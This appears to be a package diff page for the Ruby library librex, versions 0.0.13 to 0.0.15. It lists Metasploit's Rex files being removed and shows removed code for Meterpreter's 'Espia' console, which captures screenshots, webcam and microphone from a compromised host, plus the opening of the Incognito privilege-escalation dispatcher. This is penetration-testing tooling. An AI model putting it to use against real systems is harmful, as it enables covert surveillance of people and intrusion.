librex 0.0.13 → 0.0.15
Sign up to get free protection for your applications and to get access to all the features.
- data/README.markdown +1 -1
- data/Rakefile +1 -0
- metadata +3 -435
- data/lib/rex/LICENSE +0 -29
- data/lib/rex/arch.rb +0 -103
- data/lib/rex/arch/sparc.rb +0 -75
- data/lib/rex/arch/sparc.rb.ut.rb +0 -18
- data/lib/rex/arch/x86.rb +0 -513
- data/lib/rex/arch/x86.rb.ut.rb +0 -93
- data/lib/rex/assembly/nasm.rb +0 -104
- data/lib/rex/assembly/nasm.rb.ut.rb +0 -22
- data/lib/rex/codepage.map +0 -104
- data/lib/rex/compat.rb +0 -311
- data/lib/rex/constants.rb +0 -113
- data/lib/rex/elfparsey.rb +0 -11
- data/lib/rex/elfparsey/elf.rb +0 -123
- data/lib/rex/elfparsey/elfbase.rb +0 -258
- data/lib/rex/elfparsey/exceptions.rb +0 -27
- data/lib/rex/elfscan.rb +0 -12
- data/lib/rex/elfscan/scanner.rb +0 -207
- data/lib/rex/elfscan/search.rb +0 -46
- data/lib/rex/encoder/alpha2.rb +0 -31
- data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -68
- data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -79
- data/lib/rex/encoder/alpha2/generic.rb +0 -114
- data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -117
- data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -129
- data/lib/rex/encoder/ndr.rb +0 -89
- data/lib/rex/encoder/ndr.rb.ut.rb +0 -44
- data/lib/rex/encoder/nonalpha.rb +0 -61
- data/lib/rex/encoder/nonupper.rb +0 -64
- data/lib/rex/encoder/xdr.rb +0 -106
- data/lib/rex/encoder/xdr.rb.ut.rb +0 -29
- data/lib/rex/encoder/xor.rb +0 -69
- data/lib/rex/encoder/xor/dword.rb +0 -13
- data/lib/rex/encoder/xor/dword_additive.rb +0 -13
- data/lib/rex/encoders/xor_dword.rb +0 -35
- data/lib/rex/encoders/xor_dword_additive.rb +0 -53
- data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -12
- data/lib/rex/encoding/xor.rb +0 -20
- data/lib/rex/encoding/xor.rb.ts.rb +0 -14
- data/lib/rex/encoding/xor/byte.rb +0 -15
- data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -21
- data/lib/rex/encoding/xor/dword.rb +0 -21
- data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -15
- data/lib/rex/encoding/xor/dword_additive.rb +0 -92
- data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -15
- data/lib/rex/encoding/xor/exceptions.rb +0 -17
- data/lib/rex/encoding/xor/generic.rb +0 -146
- data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -120
- data/lib/rex/encoding/xor/qword.rb +0 -15
- data/lib/rex/encoding/xor/word.rb +0 -21
- data/lib/rex/encoding/xor/word.rb.ut.rb +0 -13
- data/lib/rex/exceptions.rb +0 -275
- data/lib/rex/exceptions.rb.ut.rb +0 -44
- data/lib/rex/exploitation/cmdstager.rb +0 -9
- data/lib/rex/exploitation/cmdstager/base.rb +0 -175
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -142
- data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -136
- data/lib/rex/exploitation/cmdstager/tftp.rb +0 -63
- data/lib/rex/exploitation/cmdstager/vbs.rb +0 -128
- data/lib/rex/exploitation/egghunter.rb +0 -277
- data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -25
- data/lib/rex/exploitation/encryptjs.rb +0 -77
- data/lib/rex/exploitation/heaplib.js.b64 +0 -331
- data/lib/rex/exploitation/heaplib.rb +0 -94
- data/lib/rex/exploitation/javascriptosdetect.rb +0 -897
- data/lib/rex/exploitation/obfuscatejs.rb +0 -335
- data/lib/rex/exploitation/omelet.rb +0 -320
- data/lib/rex/exploitation/omelet.rb.ut.rb +0 -13
- data/lib/rex/exploitation/opcodedb.rb +0 -818
- data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -279
- data/lib/rex/exploitation/seh.rb +0 -92
- data/lib/rex/exploitation/seh.rb.ut.rb +0 -19
- data/lib/rex/file.rb +0 -112
- data/lib/rex/file.rb.ut.rb +0 -16
- data/lib/rex/image_source.rb +0 -12
- data/lib/rex/image_source/disk.rb +0 -60
- data/lib/rex/image_source/image_source.rb +0 -46
- data/lib/rex/image_source/memory.rb +0 -37
- data/lib/rex/io/bidirectional_pipe.rb +0 -157
- data/lib/rex/io/datagram_abstraction.rb +0 -35
- data/lib/rex/io/stream.rb +0 -319
- data/lib/rex/io/stream_abstraction.rb +0 -197
- data/lib/rex/io/stream_server.rb +0 -211
- data/lib/rex/job_container.rb +0 -187
- data/lib/rex/logging.rb +0 -4
- data/lib/rex/logging/log_dispatcher.rb +0 -179
- data/lib/rex/logging/log_sink.rb +0 -42
- data/lib/rex/logging/sinks/flatfile.rb +0 -55
- data/lib/rex/logging/sinks/stderr.rb +0 -43
- data/lib/rex/machparsey.rb +0 -9
- data/lib/rex/machparsey/exceptions.rb +0 -34
- data/lib/rex/machparsey/mach.rb +0 -209
- data/lib/rex/machparsey/machbase.rb +0 -408
- data/lib/rex/machscan.rb +0 -9
- data/lib/rex/machscan/scanner.rb +0 -217
- data/lib/rex/mime.rb +0 -9
- data/lib/rex/mime/header.rb +0 -77
- data/lib/rex/mime/message.rb +0 -144
- data/lib/rex/mime/part.rb +0 -20
- data/lib/rex/nop/opty2.rb +0 -108
- data/lib/rex/nop/opty2.rb.ut.rb +0 -23
- data/lib/rex/nop/opty2_tables.rb +0 -300
- data/lib/rex/ole.rb +0 -205
- data/lib/rex/ole/clsid.rb +0 -47
- data/lib/rex/ole/difat.rb +0 -141
- data/lib/rex/ole/directory.rb +0 -231
- data/lib/rex/ole/direntry.rb +0 -240
- data/lib/rex/ole/docs/dependencies.txt +0 -8
- data/lib/rex/ole/docs/references.txt +0 -1
- data/lib/rex/ole/fat.rb +0 -99
- data/lib/rex/ole/header.rb +0 -204
- data/lib/rex/ole/minifat.rb +0 -77
- data/lib/rex/ole/propset.rb +0 -144
- data/lib/rex/ole/samples/create_ole.rb +0 -27
- data/lib/rex/ole/samples/dir.rb +0 -35
- data/lib/rex/ole/samples/dump_stream.rb +0 -34
- data/lib/rex/ole/samples/ole_info.rb +0 -23
- data/lib/rex/ole/storage.rb +0 -395
- data/lib/rex/ole/stream.rb +0 -53
- data/lib/rex/ole/substorage.rb +0 -49
- data/lib/rex/ole/util.rb +0 -157
- data/lib/rex/parser/arguments.rb +0 -97
- data/lib/rex/parser/arguments.rb.ut.rb +0 -67
- data/lib/rex/parser/ini.rb +0 -185
- data/lib/rex/parser/ini.rb.ut.rb +0 -29
- data/lib/rex/parser/ip360_aspl_xml.rb +0 -102
- data/lib/rex/parser/ip360_xml.rb +0 -93
- data/lib/rex/parser/nessus_xml.rb +0 -118
- data/lib/rex/parser/netsparker_xml.rb +0 -94
- data/lib/rex/parser/nexpose_xml.rb +0 -131
- data/lib/rex/parser/nmap_xml.rb +0 -121
- data/lib/rex/parser/retina_xml.rb +0 -109
- data/lib/rex/payloads.rb +0 -1
- data/lib/rex/payloads/win32.rb +0 -2
- data/lib/rex/payloads/win32/common.rb +0 -26
- data/lib/rex/payloads/win32/kernel.rb +0 -53
- data/lib/rex/payloads/win32/kernel/common.rb +0 -54
- data/lib/rex/payloads/win32/kernel/migration.rb +0 -12
- data/lib/rex/payloads/win32/kernel/recovery.rb +0 -50
- data/lib/rex/payloads/win32/kernel/stager.rb +0 -194
- data/lib/rex/peparsey.rb +0 -12
- data/lib/rex/peparsey/exceptions.rb +0 -32
- data/lib/rex/peparsey/pe.rb +0 -212
- data/lib/rex/peparsey/pe_memdump.rb +0 -63
- data/lib/rex/peparsey/pebase.rb +0 -1680
- data/lib/rex/peparsey/section.rb +0 -136
- data/lib/rex/pescan.rb +0 -13
- data/lib/rex/pescan/analyze.rb +0 -309
- data/lib/rex/pescan/scanner.rb +0 -206
- data/lib/rex/pescan/search.rb +0 -56
- data/lib/rex/platforms.rb +0 -1
- data/lib/rex/platforms/windows.rb +0 -51
- data/lib/rex/poly.rb +0 -132
- data/lib/rex/poly/block.rb +0 -477
- data/lib/rex/poly/register.rb +0 -100
- data/lib/rex/poly/register/x86.rb +0 -40
- data/lib/rex/post.rb +0 -8
- data/lib/rex/post/dir.rb +0 -51
- data/lib/rex/post/file.rb +0 -172
- data/lib/rex/post/file_stat.rb +0 -220
- data/lib/rex/post/gen.pl +0 -13
- data/lib/rex/post/io.rb +0 -182
- data/lib/rex/post/meterpreter.rb +0 -4
- data/lib/rex/post/meterpreter/channel.rb +0 -445
- data/lib/rex/post/meterpreter/channel_container.rb +0 -54
- data/lib/rex/post/meterpreter/channels/pool.rb +0 -160
- data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -62
- data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -103
- data/lib/rex/post/meterpreter/channels/stream.rb +0 -87
- data/lib/rex/post/meterpreter/client.rb +0 -364
- data/lib/rex/post/meterpreter/client_core.rb +0 -274
- data/lib/rex/post/meterpreter/dependencies.rb +0 -3
- data/lib/rex/post/meterpreter/extension.rb +0 -32
- data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -58
- data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -16
- data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -94
- data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -21
- data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +0 -57
- data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +0 -15
- data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -118
- data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -61
- data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -111
- data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -28
- data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +0 -101
- data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +0 -26
- data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -333
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -282
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +0 -266
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -103
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -48
- data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -144
- data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -73
- data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -56
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +0 -137
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +0 -180
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -167
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +0 -208
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -6
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +0 -38106
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -31
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +0 -47
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -36
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +0 -1818
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +0 -96
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +0 -3848
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +0 -26
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +0 -153
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +0 -21
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +0 -3169
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +0 -599
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +0 -318
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +0 -100
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -42
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +0 -148
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -127
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +0 -309
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +0 -204
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +0 -51
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +0 -630
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +0 -75
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -103
- data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +0 -149
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -97
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -192
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -41
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -61
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -370
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -129
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -55
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -336
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -141
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -279
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -193
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -102
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -180
- data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +0 -211
- data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -227
- data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +0 -63
- data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -30
- data/lib/rex/post/meterpreter/object_aliases.rb +0 -83
- data/lib/rex/post/meterpreter/packet.rb +0 -688
- data/lib/rex/post/meterpreter/packet_dispatcher.rb +0 -431
- data/lib/rex/post/meterpreter/packet_parser.rb +0 -94
- data/lib/rex/post/meterpreter/packet_response_waiter.rb +0 -83
- data/lib/rex/post/meterpreter/ui/console.rb +0 -137
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -62
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +0 -730
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -108
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -241
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +0 -231
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -61
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -98
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -51
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -132
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +0 -187
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -65
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +0 -442
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +0 -298
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -486
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -315
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +0 -157
- data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -95
- data/lib/rex/post/permission.rb +0 -26
- data/lib/rex/post/process.rb +0 -57
- data/lib/rex/post/thread.rb +0 -57
- data/lib/rex/post/ui.rb +0 -52
- data/lib/rex/proto.rb +0 -13
- data/lib/rex/proto.rb.ts.rb +0 -8
- data/lib/rex/proto/dcerpc.rb +0 -6
- data/lib/rex/proto/dcerpc.rb.ts.rb +0 -9
- data/lib/rex/proto/dcerpc/client.rb +0 -361
- data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -491
- data/lib/rex/proto/dcerpc/exceptions.rb +0 -150
- data/lib/rex/proto/dcerpc/handle.rb +0 -47
- data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -85
- data/lib/rex/proto/dcerpc/ndr.rb +0 -72
- data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -41
- data/lib/rex/proto/dcerpc/packet.rb +0 -253
- data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -56
- data/lib/rex/proto/dcerpc/response.rb +0 -187
- data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -15
- data/lib/rex/proto/dcerpc/uuid.rb +0 -84
- data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -46
- data/lib/rex/proto/dhcp.rb +0 -7
- data/lib/rex/proto/dhcp/constants.rb +0 -33
- data/lib/rex/proto/dhcp/server.rb +0 -292
- data/lib/rex/proto/drda.rb +0 -5
- data/lib/rex/proto/drda.rb.ts.rb +0 -17
- data/lib/rex/proto/drda/constants.rb +0 -49
- data/lib/rex/proto/drda/constants.rb.ut.rb +0 -23
- data/lib/rex/proto/drda/packet.rb +0 -252
- data/lib/rex/proto/drda/packet.rb.ut.rb +0 -109
- data/lib/rex/proto/drda/utils.rb +0 -123
- data/lib/rex/proto/drda/utils.rb.ut.rb +0 -84
- data/lib/rex/proto/http.rb +0 -5
- data/lib/rex/proto/http.rb.ts.rb +0 -12
- data/lib/rex/proto/http/client.rb +0 -821
- data/lib/rex/proto/http/client.rb.ut.rb +0 -95
- data/lib/rex/proto/http/handler.rb +0 -46
- data/lib/rex/proto/http/handler/erb.rb +0 -128
- data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -21
- data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
- data/lib/rex/proto/http/handler/proc.rb +0 -60
- data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -24
- data/lib/rex/proto/http/header.rb +0 -161
- data/lib/rex/proto/http/header.rb.ut.rb +0 -46
- data/lib/rex/proto/http/packet.rb +0 -407
- data/lib/rex/proto/http/packet.rb.ut.rb +0 -165
- data/lib/rex/proto/http/request.rb +0 -356
- data/lib/rex/proto/http/request.rb.ut.rb +0 -214
- data/lib/rex/proto/http/response.rb +0 -90
- data/lib/rex/proto/http/response.rb.ut.rb +0 -149
- data/lib/rex/proto/http/server.rb +0 -369
- data/lib/rex/proto/http/server.rb.ut.rb +0 -79
- data/lib/rex/proto/ntlm.rb +0 -7
- data/lib/rex/proto/ntlm.rb.ut.rb +0 -177
- data/lib/rex/proto/ntlm/base.rb +0 -326
- data/lib/rex/proto/ntlm/constants.rb +0 -74
- data/lib/rex/proto/ntlm/crypt.rb +0 -415
- data/lib/rex/proto/ntlm/exceptions.rb +0 -9
- data/lib/rex/proto/ntlm/message.rb +0 -533
- data/lib/rex/proto/ntlm/utils.rb +0 -763
- data/lib/rex/proto/proxy/socks4a.rb +0 -440
- data/lib/rex/proto/rfb.rb +0 -19
- data/lib/rex/proto/rfb.rb.ut.rb +0 -37
- data/lib/rex/proto/rfb/cipher.rb +0 -84
- data/lib/rex/proto/rfb/client.rb +0 -207
- data/lib/rex/proto/rfb/constants.rb +0 -52
- data/lib/rex/proto/smb.rb +0 -7
- data/lib/rex/proto/smb.rb.ts.rb +0 -8
- data/lib/rex/proto/smb/client.rb +0 -1952
- data/lib/rex/proto/smb/client.rb.ut.rb +0 -223
- data/lib/rex/proto/smb/constants.rb +0 -1047
- data/lib/rex/proto/smb/constants.rb.ut.rb +0 -18
- data/lib/rex/proto/smb/crypt.rb +0 -36
- data/lib/rex/proto/smb/evasions.rb +0 -66
- data/lib/rex/proto/smb/exceptions.rb +0 -858
- data/lib/rex/proto/smb/simpleclient.rb +0 -306
- data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -128
- data/lib/rex/proto/smb/utils.rb +0 -103
- data/lib/rex/proto/smb/utils.rb.ut.rb +0 -20
- data/lib/rex/proto/sunrpc.rb +0 -1
- data/lib/rex/proto/sunrpc/client.rb +0 -195
- data/lib/rex/proto/tftp.rb +0 -12
- data/lib/rex/proto/tftp/constants.rb +0 -39
- data/lib/rex/proto/tftp/server.rb +0 -497
- data/lib/rex/proto/tftp/server.rb.ut.rb +0 -28
- data/lib/rex/script.rb +0 -42
- data/lib/rex/script/base.rb +0 -59
- data/lib/rex/script/meterpreter.rb +0 -15
- data/lib/rex/script/shell.rb +0 -9
- data/lib/rex/service.rb +0 -48
- data/lib/rex/service_manager.rb +0 -141
- data/lib/rex/service_manager.rb.ut.rb +0 -32
- data/lib/rex/services/local_relay.rb +0 -423
- data/lib/rex/socket.rb +0 -684
- data/lib/rex/socket.rb.ut.rb +0 -107
- data/lib/rex/socket/comm.rb +0 -119
- data/lib/rex/socket/comm/local.rb +0 -412
- data/lib/rex/socket/comm/local.rb.ut.rb +0 -75
- data/lib/rex/socket/ip.rb +0 -130
- data/lib/rex/socket/parameters.rb +0 -345
- data/lib/rex/socket/parameters.rb.ut.rb +0 -51
- data/lib/rex/socket/range_walker.rb +0 -346
- data/lib/rex/socket/range_walker.rb.ut.rb +0 -55
- data/lib/rex/socket/ssl_tcp.rb +0 -184
- data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -39
- data/lib/rex/socket/ssl_tcp_server.rb +0 -122
- data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -61
- data/lib/rex/socket/subnet_walker.rb +0 -75
- data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -28
- data/lib/rex/socket/switch_board.rb +0 -278
- data/lib/rex/socket/switch_board.rb.ut.rb +0 -52
- data/lib/rex/socket/tcp.rb +0 -76
- data/lib/rex/socket/tcp.rb.ut.rb +0 -64
- data/lib/rex/socket/tcp_server.rb +0 -67
- data/lib/rex/socket/tcp_server.rb.ut.rb +0 -44
- data/lib/rex/socket/udp.rb +0 -164
- data/lib/rex/socket/udp.rb.ut.rb +0 -44
- data/lib/rex/struct2.rb +0 -5
- data/lib/rex/struct2/c_struct.rb +0 -181
- data/lib/rex/struct2/c_struct_template.rb +0 -39
- data/lib/rex/struct2/constant.rb +0 -26
- data/lib/rex/struct2/element.rb +0 -44
- data/lib/rex/struct2/generic.rb +0 -73
- data/lib/rex/struct2/restraint.rb +0 -54
- data/lib/rex/struct2/s_string.rb +0 -72
- data/lib/rex/struct2/s_struct.rb +0 -111
- data/lib/rex/sync.rb +0 -6
- data/lib/rex/sync/event.rb +0 -94
- data/lib/rex/sync/read_write_lock.rb +0 -176
- data/lib/rex/sync/ref.rb +0 -57
- data/lib/rex/sync/thread_safe.rb +0 -82
- data/lib/rex/test.rb +0 -35
- data/lib/rex/text.rb +0 -1149
- data/lib/rex/text.rb.ut.rb +0 -190
- data/lib/rex/thread_factory.rb +0 -42
- data/lib/rex/time.rb +0 -65
- data/lib/rex/transformer.rb +0 -115
- data/lib/rex/transformer.rb.ut.rb +0 -38
- data/lib/rex/ui.rb +0 -21
- data/lib/rex/ui/interactive.rb +0 -254
- data/lib/rex/ui/output.rb +0 -78
- data/lib/rex/ui/output/none.rb +0 -18
- data/lib/rex/ui/progress_tracker.rb +0 -96
- data/lib/rex/ui/subscriber.rb +0 -149
- data/lib/rex/ui/text/color.rb +0 -97
- data/lib/rex/ui/text/color.rb.ut.rb +0 -18
- data/lib/rex/ui/text/dispatcher_shell.rb +0 -467
- data/lib/rex/ui/text/input.rb +0 -117
- data/lib/rex/ui/text/input/buffer.rb +0 -75
- data/lib/rex/ui/text/input/readline.rb +0 -129
- data/lib/rex/ui/text/input/socket.rb +0 -95
- data/lib/rex/ui/text/input/stdio.rb +0 -45
- data/lib/rex/ui/text/irb_shell.rb +0 -57
- data/lib/rex/ui/text/output.rb +0 -80
- data/lib/rex/ui/text/output/buffer.rb +0 -61
- data/lib/rex/ui/text/output/file.rb +0 -43
- data/lib/rex/ui/text/output/socket.rb +0 -43
- data/lib/rex/ui/text/output/stdio.rb +0 -40
- data/lib/rex/ui/text/progress_tracker.rb +0 -56
- data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -34
- data/lib/rex/ui/text/shell.rb +0 -328
- data/lib/rex/ui/text/table.rb +0 -279
- data/lib/rex/ui/text/table.rb.ut.rb +0 -55
- data/lib/rex/zip.rb +0 -93
- data/lib/rex/zip/archive.rb +0 -184
- data/lib/rex/zip/blocks.rb +0 -182
- data/lib/rex/zip/entry.rb +0 -104
- data/lib/rex/zip/samples/comment.rb +0 -32
- data/lib/rex/zip/samples/mkwar.rb +0 -138
- data/lib/rex/zip/samples/mkzip.rb +0 -19
- data/lib/rex/zip/samples/recursive.rb +0 -58
@@ -1,108 +0,0 @@
|
|
1
|
-
require 'rex/post/meterpreter'
|
2
|
-
|
3
|
-
module Rex
|
4
|
-
module Post
|
5
|
-
module Meterpreter
|
6
|
-
module Ui
|
7
|
-
|
8
|
-
###
|
9
|
-
#
|
10
|
-
# Espia - Capture audio, video, screenshots from the remote system
|
11
|
-
#
|
12
|
-
###
|
13
|
-
class Console::CommandDispatcher::Espia
|
14
|
-
|
15
|
-
Klass = Console::CommandDispatcher::Espia
|
16
|
-
|
17
|
-
include Console::CommandDispatcher
|
18
|
-
|
19
|
-
#
|
20
|
-
# Initializes an instance of the espia command interaction.
|
21
|
-
#
|
22
|
-
def initialize(shell)
|
23
|
-
super
|
24
|
-
end
|
25
|
-
|
26
|
-
#
|
27
|
-
# List of supported commands.
|
28
|
-
#
|
29
|
-
def commands
|
30
|
-
{
|
31
|
-
# "dev_image" => "Attempt to grab a frame from webcam",
|
32
|
-
# "dev_audio" => "Attempt to record microphone audio",
|
33
|
-
"screengrab" => "Attempt to grab screen shot from process's active desktop"
|
34
|
-
}
|
35
|
-
end
|
36
|
-
|
37
|
-
def cmd_dev_image()
|
38
|
-
client.espia.espia_video_get_dev_image()
|
39
|
-
print_line("[*] Done.")
|
40
|
-
|
41
|
-
return true
|
42
|
-
end
|
43
|
-
|
44
|
-
def cmd_dev_audio(*args)
|
45
|
-
maxrec = 60
|
46
|
-
|
47
|
-
if (args.length < 1)
|
48
|
-
print_line("Usage: dev_audio <rec_secs>\n")
|
49
|
-
print_line("Record mic audio\n")
|
50
|
-
return true
|
51
|
-
end
|
52
|
-
|
53
|
-
secs = args[0].to_i
|
54
|
-
if secs > 0 and secs <= maxrec
|
55
|
-
milsecs = secs*1000
|
56
|
-
print_line("[*] Recording #{milsecs} miliseconds.\n")
|
57
|
-
client.espia.espia_audio_get_dev_audio(milsecs)
|
58
|
-
print_line("[*] Done.")
|
59
|
-
else
|
60
|
-
print_line("[-] Error: Recording time 0 to 60 secs \n")
|
61
|
-
end
|
62
|
-
|
63
|
-
return true
|
64
|
-
end
|
65
|
-
|
66
|
-
#
|
67
|
-
# Grab a screenshot of the current interactive desktop.
|
68
|
-
#
|
69
|
-
def cmd_screengrab( *args )
|
70
|
-
if( args[0] and args[0] == "-h" )
|
71
|
-
print_line("Usage: screengrab <path.jpeg> [view in browser: true|false]\n")
|
72
|
-
print_line("Grab a screenshot of the current interactive desktop.\n")
|
73
|
-
return true
|
74
|
-
end
|
75
|
-
|
76
|
-
show = true
|
77
|
-
show = false if (args[1] and args[1] =~ /^(f|n|0)/i)
|
78
|
-
|
79
|
-
path = args[0] || Rex::Text.rand_text_alpha(8) + ".jpeg"
|
80
|
-
|
81
|
-
data = client.espia.espia_image_get_dev_screen
|
82
|
-
|
83
|
-
if( data )
|
84
|
-
::File.open( path, 'wb' ) do |fd|
|
85
|
-
fd.write( data )
|
86
|
-
end
|
87
|
-
path = ::File.expand_path( path )
|
88
|
-
print_line( "Screenshot saved to: #{path}" )
|
89
|
-
Rex::Compat.open_file( path ) if show
|
90
|
-
end
|
91
|
-
|
92
|
-
return true
|
93
|
-
end
|
94
|
-
|
95
|
-
#
|
96
|
-
# Name for this dispatcher
|
97
|
-
#
|
98
|
-
def name
|
99
|
-
"Espia"
|
100
|
-
end
|
101
|
-
|
102
|
-
end
|
103
|
-
|
104
|
-
end
|
105
|
-
end
|
106
|
-
end
|
107
|
-
end
|
108
|
-
|
@@ -1,241 +0,0 @@
|
|
1
|
-
require 'rex/post/meterpreter'
|
2
|
-
|
3
|
-
module Rex
|
4
|
-
module Post
|
5
|
-
module Meterpreter
|
6
|
-
module Ui
|
7
|
-
|
8
|
-
###
|
9
|
-
#
|
10
|
-
# Privilege escalation extension user interface.
|
11
|
-
#
|
12
|
-
###
|
13
|
-
class Console::CommandDispatcher::Incognito
|
14
|
-
|
15
|
-
Klass = Console::CommandDispatcher::Incognito
|
16
|
-
|
17
|
-
include Console::CommandDispatcher
|
18
|
-
|
19
|
-
#
|
20
